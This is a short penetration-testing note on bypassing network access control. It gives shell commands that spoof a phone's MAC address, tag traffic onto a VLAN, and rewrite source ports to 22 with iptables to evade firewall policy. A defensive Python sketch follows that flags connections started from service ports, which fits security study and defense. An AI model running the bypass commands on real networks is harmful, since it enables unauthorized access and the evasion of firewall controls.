NAC bypass

Network access

NAC bypass scenario with VLAN tagging on a phone

upstream = interface connected to the switch = eth0

phy = interface connected to supplicant = eth1

------------ only once
modprobe br_netfilter
modprobe 8021q
----------- activate packet tagging
ifconfig eth1 down
ifconfig br0 down
vconfig add eth0 <VLAN_number>
ip addr add <IP/prefix> dev eth0.<VLAN_number>
macchanger -m <supplicant_MAC> eth0
ifconfig eth0.<VLAN_number> up
route add default gw <gw_ip>
------------- cleaning
ifconfig eth0.<VLAN_number> down
macchanger -p eth0
ifconfig eth1 up

If possible, hardcode the 3 parameters.

./ -1 eth0 -2 eth1

Modify the source port of all packets in order to evade the firewall policy. For example, take the source port used for device administration:

iptables -t nat -I POSTROUTING -p tcp -m tcp -j MASQUERADE --to-ports <22>
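
From the defender's side, the rewrite above leaves a clear trace: new TCP connections (SYN without ACK) leaving a host from a service port, usually the same port toward several destinations. The following detection sketch is an added example, not part of the original notes; the flow-record format, addresses and function names are assumptions made for illustration.

```python
"""Flag TCP connection attempts that originate from a service port."""
from collections import defaultdict

# A normal client opens connections from an ephemeral port. Source ports at or
# below 1023 should only appear in replies (SYN-ACK/ACK) sent by a server.
# Legacy clients such as rsh or some NFS mounts bind low ports: allow-list them.
PRIVILEGED_MAX = 1023

# Constructed sample records (hypothetical export format):
# time src_ip src_port dst_ip dst_port tcp_flags
SAMPLE_FLOWS = """\
10:00:01 10.0.101.23 51514 10.0.5.10 443 S
10:00:02 10.0.5.10 443 10.0.101.23 51514 SA
10:00:05 10.0.101.40 22 10.0.5.10 445 S
10:00:06 10.0.101.40 22 10.0.5.11 3389 S
10:00:07 10.0.101.40 22 10.0.5.12 80 S
10:00:09 10.0.9.2 22 10.0.101.23 40022 SA
"""

def parse(line):
    """Split one flow record into a dict with integer ports."""
    ts, src, sport, dst, dport, flags = line.split()
    return {"ts": ts, "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "flags": flags}

def is_initial_syn(flow):
    """True for the first packet of a handshake: SYN set, ACK not set."""
    return "S" in flow["flags"] and "A" not in flow["flags"]

def suspicious_initiators(text, min_targets=1):
    """Map (src_ip, src_port) to the sorted targets it opened from a low port."""
    hits = defaultdict(set)
    for line in text.splitlines():
        if not line.strip():
            continue
        flow = parse(line)
        if is_initial_syn(flow) and flow["sport"] <= PRIVILEGED_MAX:
            hits[(flow["src"], flow["sport"])].add((flow["dst"], flow["dport"]))
    return {key: sorted(targets) for key, targets in hits.items()
            if len(targets) >= min_targets}

if __name__ == "__main__":
    for (src, sport), targets in suspicious_initiators(SAMPLE_FLOWS).items():
        print(f"{src} opened {len(targets)} connection(s) "
              f"from source port {sport}: {targets}")
```

Firewall rules that match on connection state and destination, rather than trusting the source port, remove the gap this rewrite relies on.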